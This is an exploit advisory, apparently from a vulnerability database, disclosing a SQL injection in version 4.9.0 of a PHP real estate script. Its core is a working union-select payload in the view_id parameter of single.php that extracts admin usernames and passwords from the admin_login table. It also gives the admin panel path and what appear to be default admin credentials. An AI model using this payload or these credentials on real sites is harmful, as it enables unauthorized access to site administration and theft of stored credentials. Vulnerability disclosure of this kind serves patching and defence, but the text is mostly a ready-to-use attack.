PHP Real Estate Script 4.9.0 SQL Injection

2016.05.31
Credit: Meisam Monsef
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Property Agent RealeState Script Sql Injection # Date: 2015-05-27 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com # Vendor Homepage: http://www.phpscriptsmall.com/product/php-realestate-script/ # Version: 4.9.0 Exploit : http://server/[path]/single.php?view_id=-99999+[SQl+Command] Test : http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login Admin Panel : http://server/admin/ Username : admin Password : inetsol


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top